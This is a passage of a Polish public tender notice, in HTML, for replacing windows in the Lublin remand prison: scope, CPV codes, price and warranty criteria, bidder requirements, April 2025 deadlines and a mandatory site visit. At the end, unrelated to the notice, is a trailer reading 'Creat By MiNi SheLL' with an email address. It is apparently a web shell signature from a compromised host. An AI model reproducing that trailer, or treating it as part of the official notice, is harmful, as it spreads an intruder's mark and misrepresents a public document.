na własny koszt. Wykonawca zobowiązuje się do montażu niezbędnych urządzeń w sposób solidny i trwały. Wykonawca zobowiązuje się do uprzątnięcia terenu robót po zakończonych pracach remontowych. <br/> Zakres robót obejmuje demontaż dotychczas zainstalowanych okien w otworach okiennych, oraz montaż w ich miejscu nowo dostarczonych okien. Dodatkowo Wykonawca wykona prace związane z demontażem lastrykowych parapetów wewnętrznych oraz montażem nowych parapetów z konglomeratu. Wykonawca zobowiązuję się do wykonania robót wykończeniowych związanych z obróbkami glifów wewnętrznych oraz miejsc przy nowo zainstalowanych parapetach. Dodatkowo wykonawca ma obowiązek odbioru z terenu aresztu zdemontowanych okien wraz z ościeżnicami i utylizacji ich na własny koszt. <br/>	Po zewnętrznej stronie okna znajduje się krata stalowa oraz parapet zewnętrzny, których zakres robót nie obejmuje, wykonawca zobowiązuję się do wymiany okien w sposób nie powodujący uszkodzenia wymienionych elementów.<br/>	Ze względu na fakt iż, zdecydowana większość okien wymieniana będzie w celach mieszkalnych, wymiana będzie prowadzona sukcesywnie w miarę możliwości udostępniania cel. Areszt Śledczy w Lublinie jest w stanie jednorazowo zwolnić do pięciu cel mieszkalnych. W związku z tym prace montażowo wykończeniowe muszą być prowadzone sukcesywnie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45216113-9 - Roboty budowlane w zakresie budynków więziennych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45421132-8 - Instalowanie okien</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zawiera rozdział XXIII. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dla potrzeb niniejszego postępowania, Zamawiający wymaga aby przedstawiony przez Wykonawcę wykaz zawierał co najmniej 1 robotę budowlaną: <br/>W zakresie zdolności technicznej Zamawiający wymaga przedstawienia wykazu robót budowlanych (co najmniej 1 roboty) dotyczących montażu stolarki okiennej lub drzwiowej o wartości nie mniejszej niż 150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych 00/100), wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 4 do SWZ; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	W celu potwierdzenia spełniania przez wykonawcę warunków udziału <br/>w postępowaniu dotyczących posiadania zdolności technicznej lub zawodowej niezbędnej do należytego wykonania zamówienia, zamawiający zażąda następujących podmiotowych środków dowodowych:<br/>a)	wykazu robót budowlanych (co najmniej 1 roboty) dotyczących montażu stolarki okiennej lub drzwiowej o wartości nie mniejszej niż 150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych 00/100), wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 4 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ; <br/>b)	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 109 ust. 1 pkt 5) i 7) ustawy Pzp - załącznik nr 2 do SWZ; <br/>c)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> INFORMACJA DLA WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA (SPÓŁKI CYWILNE/ KONSORCJA)<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania <br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie,<br/> o którym mowa w Rozdziale XIV pkt. 2 SWZ, składa każdy z wykonawców. Oświadczenia <br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/><br/><br/>Wymagana forma: <br/>Wykonawcy składają oświadczenia w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. W przypadku <br/>gdy oświadczenie zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia lub notariusz. <br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy może nastąpić zgodnie z § 14 [Zmiany treści umowy]- załącznik nr 8 Projektowane postanowienia umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-11 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> OBOWIĄZEK WIZJI LOKALNEJ <br/>1.	Zamawiający przewiduje obowiązek odbycia przez wykonawcę wizji lokalnej, zapoznania <br/>się z zakresem prac oraz miejscem ich realizacji. <br/>2.	Warunkiem odbycia wizji jest uprzednie złożenie do Dyrektora Aresztu Śledczego w Lublinie pisemnego wniosku o wstęp na teren jednostki w celu przeprowadzenia wizji lokalnej. Wzór wniosku o wstęp na teren jednostki w celu dokonania wizji stanowi załącznik nr 10 do SWZ . Koszty zapoznania się z terenem budowy ponosi wykonawca. <br/>3.	Zgodnie z art. 226 ust. 1 pkt 18 ustawy Pzp, odrzuceniu będzie podlegać oferta, która została złożona bez odbycia wizji lokalnej w przypadku gdy zamawiający tego wymagał w dokumentach zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com